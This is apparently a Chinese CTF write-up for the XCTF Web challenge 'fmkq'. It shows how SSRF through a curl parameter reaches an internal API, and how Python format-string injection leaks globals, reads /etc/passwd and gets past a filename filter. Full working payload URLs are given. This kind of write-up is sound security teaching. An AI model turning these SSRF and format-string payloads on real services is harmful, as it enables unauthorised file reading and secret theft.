xctf-高校战疫-Web-fmkq

admin

140746
文章

117
评论

2022年1月5日23:10:42评论62 views字数 957阅读3分11秒阅读模式

xctf-高校战疫-Web-fmkq

Frank

可以令head为’\'（取全局变量）来绕过head的限制执行curl语句。

将begin设为：begin=%s%可以直接输出结果（第二个%用于转义后面的%）

本地的8080端口部署了个fmkq api

通过fuzz发现其实后面的/read/file=参数是个python的格式化字符串，参数名为file

可以获得vipcode: 3Ad8fya45bYeUOFDkJuXpjV1tGHLxzonrCWlER2mPKS9i67w
payload: /?head=\&url=http://127.0.0.1:8080/read/file={file.__class__.__init__.__globals__[vip].__init__.__globals__}%26vipcode=0&begin=%s%
xctf-高校战疫-Web-fmkq
/?head=\&url=http://127.0.0.1:8080/read/file=/etc/passwd%26vipcode=3Ad8fya45bYeUOFDkJuXpjV1tGHLxzonrCWlER2mPKS9i67w&begin=%s% 读/etc/passwd

此时可以通过读取/app/下的文件获得源码
而且看到根目录下有个
/fl4g_1s_h3re_u_wi11_rua
can’t read
看源码发现过滤了"fl4g"

本地测试时{vipfile:.2}4g_1s_h3re_u_wi11_rua/flag 这样可以绕，但是远程就internal server error
原因：进去的那一层过滤了file:

可以file={vipfile}_1s_h3re_u_wi11_rua/fl4g，但是差一个字母
反正就在各种变量里头找"fl4g_1s_h3re_u_wi11_rua"嘛
于是最后的payload：
/?head=\&url=http://127.0.0.1:8080/read/file={vipfile.__class__.__init__.__globals__[current_folder_file][21]}/flag%26vipcode=3Ad8fya45bYeUOFDkJuXpjV1tGHLxzonrCWlER2mPKS9i67w&begin=%s%

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

xctf-高校战疫-Web-fmkq

xctf-高校战疫-Web-fmkq

Frank

DEFCON 33 CTF 解题系列 #3：dialects (pwn)

plaidctf 2025 sheriff_says 题解

第九届御网杯网络安全大赛校级选拔赛题解

【CTF】2025御网杯wp Misc全解+Web全解+Crypto全解+Re3

web选手入门reverse(2)——crackme_easy

【CTF】ISCC2025练武题PWN方向WP

隐写术之音频文件类的隐写解题技巧

2025御网杯线上初赛WriteUp （Misc、Crypto）

密码学浅入浅出ECIES之椭圆曲线加密算法

【CTFer成长之路】反序列化漏洞

发表评论

在线咨询

微信